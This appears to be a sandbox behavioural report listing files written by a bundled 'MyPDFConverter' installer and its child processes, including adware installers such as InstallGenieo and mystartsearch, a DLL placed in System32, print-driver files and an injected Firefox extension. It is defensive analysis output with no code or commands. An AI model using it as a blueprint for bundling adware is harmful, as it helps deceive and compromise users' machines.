%Program Files% (x86)\GPLGS\fonts.scale (27 bytes)
%Program Files% (x86)\GPLGS\viewps2a.ps (1 bytes)
%Program Files% (x86)\GPLGS\Fontmap.VMS (14 bytes)
%Program Files% (x86)\GPLGS\gsnup.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_stres.ps (4 bytes)
%Program Files% (x86)\GPLGS\p052024l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\gs_t.xbm (353 bytes)
%Program Files% (x86)\GPLGS\gs_pdf_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\acctest.ps (4 bytes)
%Program Files% (x86)\GPLGS\b018032l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_mgl_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\pdf_draw.ps (41 bytes)
%Program Files% (x86)\GPLGS\pdf_font.ps (43 bytes)
%Program Files% (x86)\GPLGS\viewpcx.ps (4 bytes)
%Program Files% (x86)\GPLGS\n022003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\Fontmap (113 bytes)
%Program Files% (x86)\GPLGS\gs_sepr.ps (8 bytes)
%Program Files% (x86)\GPLGS\gs_typ32.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_lev2.ps (31 bytes)
%Program Files% (x86)\GPLGS\c059013l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\b018012l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gswin32c.exe (601 bytes)
%Program Files% (x86)\GPLGS\gs_type1.ps (7 bytes)
%Program Files% (x86)\GPLGS\type1enc.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_ce_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_lgo_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\addxchar.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_frsd.ps (3 bytes)
%Program Files% (x86)\GPLGS\rollconv.ps (12 bytes)
%Program Files% (x86)\GPLGS\gs_cff.ps (22 bytes)
%Program Files% (x86)\GPLGS\Info-macos.plist (483 bytes)
%Program Files% (x86)\GPLGS\gs_wl1_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_css_e.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_ksb_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_l.xbm (1 bytes)
%Program Files% (x86)\GPLGS\ht_ccsto.ps (1281 bytes)
%Program Files% (x86)\GPLGS\gs_il2_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_t_m.xbm (363 bytes)
%Program Files% (x86)\GPLGS\Fontmap.Sol (16 bytes)
%Program Files% (x86)\GPLGS\uninfo.ps (6 bytes)
%Program Files% (x86)\GPLGS\pdf_rbld.ps (13 bytes)
%Program Files% (x86)\GPLGS\Fontmap.OSF (6 bytes)
%Program Files% (x86)\GPLGS\gs_devcs.ps (6 bytes)
%Program Files% (x86)\GPLGS\decrypt.ps (369 bytes)
%Program Files% (x86)\GPLGS\gs_dps2.ps (7 bytes)
%Program Files% (x86)\GPLGS\p052023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ttf.ps (43 bytes)
%Program Files% (x86)\GPLGS\pdf_ops.ps (21 bytes)
%Program Files% (x86)\GPLGS\viewjpeg.ps (5 bytes)
%Program Files% (x86)\GPLGS\pdfopt.ps (37 bytes)
%Program Files% (x86)\GPLGS\pdf_sec.ps (10 bytes)
%Program Files% (x86)\GPLGS\type1ops.ps (7 bytes)
%Program Files% (x86)\GPLGS\printafm.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_btokn.ps (11 bytes)
%Program Files% (x86)\GPLGS\a010035l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n022004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_dscp.ps (4 bytes)
%Program Files% (x86)\GPLGS\Fontmap.GS (13 bytes)
%Program Files% (x86)\GPLGS\gsdll32.dll (19686 bytes)
%Program Files% (x86)\GPLGS\gs_l.xpm (2 bytes)
%Program Files% (x86)\GPLGS\gs_cspace.ps (30 bytes)
%Program Files% (x86)\GPLGS\showpage.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_std_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\wftopfa.ps (9 bytes)
%Program Files% (x86)\GPLGS\stcolor.ps (5 bytes)
%Program Files% (x86)\GPLGS\pf2afm.ps (15 bytes)
%Program Files% (x86)\GPLGS\gs_statd.ps (13 bytes)
%Program Files% (x86)\GPLGS\gs_typ42.ps (1 bytes)
%Program Files% (x86)\GPLGS\docie.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_cmdl.ps (5 bytes)
%Program Files% (x86)\GPLGS\prfont.ps (6 bytes)
%Program Files% (x86)\GPLGS\gs_sym_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_s_m.xbm (615 bytes)
%Program Files% (x86)\GPLGS\caption.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_cidfm.ps (4 bytes)
%Program Files% (x86)\GPLGS\pphs (220 bytes)
%Program Files% (x86)\GPLGS\gs_icc.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_epsf.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_ciecs2.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_devn.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_dps.ps (8 bytes)
%Program Files% (x86)\GPLGS\n019024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\level1.ps (117 bytes)
%Program Files% (x86)\GPLGS\gs_resst.ps (5 bytes)
%Program Files% (x86)\GPLGS\Fontmap.OS2 (7 bytes)
%Program Files% (x86)\GPLGS\c059033l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_rdlin.ps (886 bytes)
%Program Files% (x86)\GPLGS\gs_dpnxt.ps (4 bytes)
%Program Files% (x86)\GPLGS\cid2code.ps (4 bytes)
%Program Files% (x86)\GPLGS\n021023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ciddc.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_init.ps (601 bytes)
%Program Files% (x86)\GPLGS\gs_cidtt.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_img.ps (22 bytes)
%Program Files% (x86)\GPLGS\gs_pfile.ps (4 bytes)
%Program Files% (x86)\GPLGS\c059036l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\c059016l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_m_m.xbm (971 bytes)
%Program Files% (x86)\GPLGS\Fontmap.ATM (5 bytes)
%Program Files% (x86)\GPLGS\markpath.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_devpxl.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_cidcm.ps (16 bytes)
%Program Files% (x86)\GPLGS\gs_diskn.ps (7 bytes)
%Program Files% (x86)\GPLGS\n019044l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n022024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_cmap.ps (17 bytes)
%Program Files% (x86)\GPLGS\Fontmap.ATB (6 bytes)
%Program Files% (x86)\GPLGS\pdf2dsc.ps (5 bytes)
%Program Files% (x86)\GPLGS\pphs.ps (7 bytes)
%Program Files% (x86)\GPLGS\unprot.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_fform.ps (3 bytes)
%Program Files% (x86)\GPLGS\landscap.ps (1 bytes)
%Program Files% (x86)\GPLGS\wrfont.ps (18 bytes)
%Program Files% (x86)\GPLGS\lines.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_cidfn.ps (13 bytes)
%Program Files% (x86)\GPLGS\gs_mex_e.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_lgx_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\traceimg.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_l2img.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_ccfnt.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_kanji.ps (4 bytes)
%Program Files% (x86)\GPLGS\a010033l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_l_m.xbm (1 bytes)
%Program Files% (x86)\GPLGS\a010015l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\pfbtopfa.ps (1 bytes)
%Program Files% (x86)\GPLGS\b018015l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n019064l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\Fontmap.SGI (14 bytes)
%Program Files% (x86)\GPLGS\ppath.ps (2 bytes)
%Program Files% (x86)\GPLGS\viewpbm.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_res.ps (35 bytes)
%Program Files% (x86)\GPLGS\gs_s.xbm (605 bytes)
%Program Files% (x86)\GPLGS\n019004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_m.xpm (1 bytes)
%Program Files% (x86)\GPLGS\gs_m.xbm (961 bytes)
%Program Files% (x86)\GPLGS\s050000l.pfb (33 bytes)
%Program Files% (x86)\GPLGS\p052004l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\font2c.ps (20 bytes)
%Program Files% (x86)\GPLGS\stcinfo.ps (26 bytes)
%Program Files% (x86)\GPLGS\gs_t.xpm (633 bytes)
%Program Files% (x86)\GPLGS\gslp.ps (20 bytes)
%Program Files% (x86)\GPLGS\pcharstr.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_dbt_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_patrn.ps (8 bytes)
%Program Files% (x86)\GPLGS\xlatmap (1 bytes)
%Program Files% (x86)\GPLGS\n019023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\ps2ai.ps (23 bytes)
%Program Files% (x86)\GPLGS\gs_indxd.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_trap.ps (3 bytes)
%Program Files% (x86)\GPLGS\errpage.ps (8 bytes)
%Program Files% (x86)\GPLGS\n019003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\stocht.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_mro_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\bdftops.ps (24 bytes)
%Program Files% (x86)\GPLGS\winmaps.ps (3 bytes)
%Program Files% (x86)\GPLGS\viewgif.ps (4 bytes)
%Program Files% (x86)\GPLGS\pdf_base.ps (25 bytes)
%Program Files% (x86)\GPLGS\gs_s.xpm (993 bytes)
%Program Files% (x86)\GPLGS\pdf_main.ps (35 bytes)
%Program Files% (x86)\GPLGS\gs_dps1.ps (4 bytes)
%Program Files% (x86)\GPLGS\n022023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n021003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\d050000l.pfb (45 bytes)
%Program Files% (x86)\GPLGS\gs_wl5_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_agl.ps (29 bytes)
%Program Files% (x86)\GPLGS\impath.ps (5 bytes)
%Program Files% (x86)\GPLGS\pdfwrite.ps (10 bytes)
%Program Files% (x86)\GPLGS\COPYING (17 bytes)
%Program Files% (x86)\GPLGS\gs_pdfwr.ps (21 bytes)
%Program Files% (x86)\GPLGS\a010013l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\jispaper.ps (961 bytes)
%Program Files% (x86)\GPLGS\showchar.ps (3 bytes)
%Program Files% (x86)\GPLGS\font2pcl.ps (18 bytes)
%Program Files% (x86)\GPLGS\viewmiff.ps (3 bytes)
%Program Files% (x86)\GPLGS\n021024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_resmp.ps (21 bytes)
%Program Files% (x86)\GPLGS\n019043l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\align.ps (2 bytes)
%Program Files% (x86)\GPLGS\p052003l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\gs_setpd.ps (28 bytes)
%Program Files% (x86)\GPLGS\b018035l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ll3.ps (10 bytes)
%Program Files% (x86)\GPLGS\image-qa.ps (601 bytes)
%Program Files% (x86)\GPLGS\gs_fapi.ps (9 bytes)
%Program Files% (x86)\GPLGS\n019063l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_fntem.ps (11 bytes)
%Program Files% (x86)\GPLGS\gs_ciecs3.ps (3 bytes)
%Program Files% (x86)\GPLGS\packfile.ps (10 bytes)

The process Setup.exe:468 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files% (x86)\MyPDFConverter\setup.inf (312 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT5.DLL (4185 bytes)
%Program Files% (x86)\MyPDFConverter\README.HTM (4 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT.HLP (26 bytes)
C:\Windows\System32\spool\drivers\x64\CUSTPDFW.PPD (31 bytes)
%Program Files% (x86)\MyPDFConverter\setup\unInstpw64.exe (24 bytes)
%Program Files% (x86)\MyPDFConverter\PDFWrite.rsp (116 bytes)
C:\Windows\System32\spool\drivers\x64\PS5UI.DLL (5873 bytes)
%Program Files% (x86)\MyPDFConverter\CPWriter2.exe (601 bytes)
%Program Files% (x86)\MyPDFConverter\unInstpw64.exe (23 bytes)
%Program Files% (x86)\MyPDFConverter\Preferences.exe (24 bytes)
%Program Files% (x86)\MyPDFConverter\setup\Converter.exe (678 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT.NTF (7433 bytes)
%Program Files% (x86)\MyPDFConverter\pdfwriter.exe (43 bytes)

The process appshat.exe:4072 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\StdUtils.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Qzcggrhivnxb.tmp (455919 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Vlwgfsqfpaz.exe (1749665 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1058.bat (411 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\FacebookIsGod.dll (2552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_d (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_e (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_b (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_c (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_a (167333 bytes)

The process biclient.exe:2452 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[1].htm (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.2 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (1156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe (21724 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[2].htm (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe (70607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\mydpfconv icon[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.4 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.5 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.1 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.0 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.3 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.2 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.5 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.4 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.7 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.6 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyo_sprite_full[1].png (1300 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5P76D326.txt (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-mystartsearch[1].htm (1871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.3 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.0 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\4b5cb7aab8d80a4ba5daaec3cbcf46f0[1].htm (43893 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.6 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.7 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.1 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp (40116 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-sourceapp[1].htm (4319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8CO6P6LD.txt (94 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp (79808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe (22888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyoThreeWavesBG[1].jpg (200 bytes)

The process unInstpw64.exe:2004 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\System32\custmon64.dll (601 bytes)

The process 11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\221.js (419 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\234.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\288.js (557 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\dbe88a314f000d3b15042465fdf21cc5.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\c422d0a33c0be34d39a93687c738b5f0.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\255.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon24.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button1.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\7df47bd2f0a36fc56fb4d5f85d879331.js (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\2edcf1d6343b69377b1b5ab704fc0dba.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\ab9e8724735655aca91d2a7b089e2a0b.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\install.rdf (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\263.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\911be52d07701495078e83a9206b167f.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\17f548e3cc7f3ff5ea90135d36d5617d.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\04e8dd99d8507cb819f5842891bb38e1.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\skin.css (909 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\8d67ab46bd5bcae77c6c6b11b5654720.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\301.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\ddf2e4e66be71a3aa501f0f1d81c9768.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\262.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\d2eb933c47d0580044f729e920ee557c.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\281.js (489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\userCode\extension.js (358 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\options.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button2.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button3.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\527da7a7cda8dba99ce791702fd18eae.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\cb61f016464902e3e7abde750ef80ba6.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\6e6d2fa3e2de0ad6f80c88dde043160a.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\345.js (611 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button4.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\a5d8eadabd69a1a5fd8936768f25760f.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\browser.xul (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\407fbe3700b14ae5bb1391d614260019.js (5 bytes)
